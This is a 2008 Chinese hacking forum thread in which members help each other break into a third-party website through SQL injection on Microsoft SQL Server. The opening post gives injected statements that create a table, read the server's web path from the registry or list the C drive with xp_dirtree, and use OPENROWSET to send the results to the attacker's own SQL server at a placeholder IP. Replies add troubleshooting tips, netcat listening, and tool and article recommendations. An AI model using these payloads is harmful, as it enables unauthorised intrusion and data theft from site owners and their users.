Rank: 5 Rank: 5

帖子: 255
积分: 678
威望: 1093
金钱: 877
在线时间: 2 小时

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2008-7-20 18:04 | 只看该作者

[讨论]SQL注入屏蔽错误提示找路径的一些问题

[讨论]SQL注入屏蔽错误提示找路径的一些问题
议题作者：圣堂骑士
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

一个注入。MSSQL的DB权限
本想列目录写一句话
结果拿给阿D跑，发现无法列目录，手工提交发现是屏蔽了错误显示
想用openrowset连接本机mssql得路径
然后在对方机器上建立个表
1.create table [dbo].[fenggou]([cha8][char](255))--
2.DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
3.DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM fenggou) exec (@a1);--

最后在本机没有读出路径。怀疑是注册表做了改动
所以问题来了，我想问下。能否运用同样的方法将xp_dirtree读出的数据。通过本地SQL跟踪器查看到
如果能的话。希望能写写语句。因为小弟太菜构造了半天也没构造出来
希望大牛们帮帮忙。

帖子13 精华0 积分48 阅读权限40 性别男在线时间12 小时注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用报告回复 TOP 少女暴富的隐秘（图）

gxm

荣誉会员

拖车文

3.A.S.T士兵

Rank: 1

帖子: 35
积分: 53
威望: 70
金钱: 69
在线时间: 0 小时

2楼

发表于 2008-7-20 18:04 | 只看该作者

'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots'，这个只能是win2000的有效，2003不存在这个问题。很大可能你入侵的机器是2003，如果你说工具列不出目录的话，那么就放弃吧，一般注入点是DB权限的话，没有屏蔽错误的话，有xp_dirtree的话，列目录应该很快，屏蔽错误的话，工具应该会用xp_dirtree过程得到的目录写进一个表，然后读出来，你所遇到的问题可能是其中的几个
第一：你的网速慢（可能性不大）
第二：没有xp_dirtree过程（可能性不大）
第三：啊D一般会暴错权限，你用下NBSI或者domain，很大可能的权限是PUBLIC权限（可能性很大）我一般都会这样
还有需要不确定因素，自己去排除吧
帖子43 精华0 积分3206 阅读权限100 性别男在线时间29 小时注册时间2007-1-13 最后登录2008-6-30 查看详细资料引用报告回复 TOP 赚更多的钱

烟，灭在雪里

荣誉会员

TOP

教授2

3.A.S.T士兵

Rank: 1

帖子: 14
积分: 20
威望: 26
金钱: 24
在线时间: 0 小时

3楼

发表于 2008-7-20 18:04 | 只看该作者

不显错的时候如果网速慢反正啊D有时候就不能列上次和朋友搞一个站我感觉就没删除xp_dirtree 换了个网吧速度刷刷的第三点GXM分析的到是相当有可能但是貌似如果是MS不显错模式那么NB检查的权限也不怎么准如果真的事PUBLIC 你可以尝试某大牛用全局临时表的方法来列下看看估计木啥用不看好晕忽忽

帖子18 精华0 积分60 阅读权限100 在线时间30 小时注册时间2007-9-15 最后登录2008-6-24 查看个人网站
查看详细资料引用报告回复 TOP 软件项目外包

圣堂骑士

晶莹剔透§烈日灼然

TOP

醉鞭名马

3.A.S.T少尉

Rank: 2

帖子: 44
积分: 66
威望: 88
金钱: 87
在线时间: 0 小时

4楼

发表于 2008-7-20 18:04 | 只看该作者

先xx楼上两位下
我想问问如果假设确定已是db，xp_dirtee没有删除
就是利用xp_dirtree 列c盘的内容，然后利用openrowset连接本机，就相当于fenggou这个表多了条这个语句SELECT * FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'SELECT * FROM pubs.dbo.authors where au_fname=''C盘的目录''')AS a
能否实现，因为小弟没按sql server无法测试，谢谢大大们帮看看
DECLARE @result varchar(255) exec master.dbo.xp_dirtree ,'c:\',@result output insert into fenggou (cha8) values('SELECT * FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

帖子13 精华0 积分48 阅读权限40 性别男在线时间12 小时注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用报告回复 TOP

gxm

荣誉会员

TOP

44447777kun

3.A.S.T少尉

Rank: 2

帖子: 43
积分: 64
威望: 84
金钱: 81
在线时间: 0 小时

5楼

发表于 2008-7-20 18:04 | 只看该作者

呵呵，这种方法一定要本地安装mssql才行，但是我不建议这么做。你如果确定真的是db权限，并且有xp_dirtree的话，那么请你先在注入点上先建立表，然后用xp_dirtree把目录插进你建议的表中，然后用工具把目录读出来。我以为碰到的一个站是2000服务器，也因为他的屏蔽错误提示，但是就是把用xp_regread过程读出'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots',里的东西插入表中。然后在用工具读出表的内容的。尝试下吧
帖子43 精华0 积分3206 阅读权限100 性别男在线时间29 小时注册时间2007-1-13 最后登录2008-6-30 查看详细资料引用报告回复 TOP 少女暴富的隐秘（图）

烟，灭在雪里

荣誉会员

TOP

巫山北

3.A.S.T士兵

Rank: 1

帖子: 19
积分: 29
威望: 38
金钱: 38
在线时间: 0 小时

6楼

发表于 2008-7-20 18:04 | 只看该作者

反连IP并不见得非要装SQL嘛你可以用NC监听当有连接不就看见IP了吗真是的晕翻你

帖子18 精华0 积分60 阅读权限100 在线时间30 小时注册时间2007-9-15 最后登录2008-6-24 查看个人网站
查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

圣堂骑士

晶莹剔透§烈日灼然

TOP

H先生

3.A.S.T士兵

Rank: 1

帖子: 20
积分: 30
威望: 40
金钱: 34
在线时间: 0 小时

7楼

发表于 2008-7-20 18:04 | 只看该作者

先谢谢gxm了。兄弟你可能理解错了。
不知道你玩过那个洞网7.10DAY没。只要语法没有出错就返回的正常。相当于。加and 1=1和and 1=2返回一样的。所以完全无法判断。更不可能甩给工具跑了。所以才想到用openrowset这一烂招。让他连接我。让他抱的错，直接爆我这来。我就是不知道。我上面的xp_dirtree c:\能不能玩

帖子13 精华0 积分48 阅读权限40 性别男在线时间12 小时注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

圣堂骑士

晶莹剔透§烈日灼然

TOP

孙林

3.A.S.T士兵

Rank: 1

帖子: 30
积分: 45
威望: 60
金钱: 56
在线时间: 0 小时

8楼

发表于 2008-7-20 18:04 | 只看该作者

gxm兄。能否能给个qq或者msn。想跟你交流交流

帖子13 精华0 积分48 阅读权限40 性别男在线时间12 小时注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用报告回复 TOP

56352351

晶莹剔透§烈日灼然

TOP

风云仔

3.A.S.T士兵

Rank: 1

帖子: 13
积分: 20
威望: 26
金钱: 26
在线时间: 0 小时

9楼

发表于 2008-7-20 18:04 | 只看该作者

恩.........楼主不知道看过这2篇文章没,看看可能思路就清晰了
http://hi.baidu.com/lever/blog/item/4ec0d1588d15cc80800a188a.html
http://blog.csdn.net/ring04h/archive/2007/01/28/1496017.aspx
我觉得写的很好,呵呵~个人意见啊~
帖子13 精华0 积分48 阅读权限40 性别男在线时间17 小时注册时间2007-12-21 最后登录2008-5-3 查看详细资料引用报告回复 TOP

gxm

荣誉会员

TOP

1606

3.A.S.T士兵

Rank: 1

帖子: 24
积分: 36
威望: 48
金钱: 47
在线时间: 0 小时

10楼

发表于 2008-7-20 18:04 | 只看该作者

我的QQ是：419891509
呵呵，如果是返回 and 1=1 和and 1=2都是一个页面？需要环境，如果可以的话联系我吧，杂们一起研究
帖子43 精华0 积分3206 阅读权限100 性别男在线时间29 小时注册时间2007-1-13 最后登录2008-6-30 查看详细资料引用报告回复 TOP

圣堂骑士

晶莹剔透§烈日灼然

TOP

may

3.A.S.T士兵

Rank: 1

帖子: 18
积分: 26
威望: 34
金钱: 32
在线时间: 0 小时

11楼

发表于 2008-7-20 18:04 | 只看该作者

我服YOU了。56352351。你太帅了
SQL INJECTION的终极利器opendatasource和openrowset这篇文章帮大忙了。
学习了。
太感谢了

帖子13 精华0 积分48 阅读权限40 性别男在线时间12 小时注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用报告回复 TOP

56352351

晶莹剔透§烈日灼然

TOP

小丫头

3.A.S.T士兵

Rank: 1

帖子: 15
积分: 23
威望: 30
金钱: 25
在线时间: 0 小时

12楼

发表于 2008-7-20 18:04 | 只看该作者

呵呵~~过段时间看能不能写个工具出来~在努力中~~
帖子13 精华0 积分48 阅读权限40 性别男在线时间17 小时注册时间2007-12-21 最后登录2008-5-3 查看详细资料引用报告回复 TOP

fatcat

晶莹剔透§烈日灼然

TOP

拖车文

3.A.S.T士兵

Rank: 1

帖子: 35
积分: 53
威望: 70
金钱: 69
在线时间: 0 小时

13楼

发表于 2008-7-20 18:04 | 只看该作者

openrowset这个04年小黑就出了工具了，现在很多机器越来越严了，难反连的。
而且SQL2005默认是禁止的!以后还是写进数据库慢慢猜解有前途晕啊晕
帖子45 精华0 积分145 阅读权限40 性别男来自浙江在线时间68 小时注册时间2004-11-9 最后登录2008-7-2 查看详细资料引用报告回复 TOP

56352351

晶莹剔透§烈日灼然

TOP

胖嘟嘟

3.A.S.T士兵

Rank: 1

帖子: 17
积分: 25
威望: 33
金钱: 30
在线时间: 0 小时

14楼

发表于 2008-7-20 18:04 | 只看该作者

出了工具了?我死都没找到啊,奇怪.
2005我看了些,不知道能不能用SQL命令吧默认设置改了,这个会暴露IP的确是很麻烦.但是在关闭回显的时候是效率很高,你那工具有吗?有的话能告诉我在哪下吗? 谢谢了
帖子13 精华0 积分48 阅读权限40 性别男在线时间17 小时注册时间2007-12-21 最后登录2008-5-3 查看详细资料引用报告回复 TOP

kosi

晶莹剔透§烈日灼然

TOP

返回列表

[讨论]SQL注入屏蔽错误提示找路径的一些问题

[收藏此主题] [关注此主题的新回复]

[通过 QQ、MSN 分享给朋友]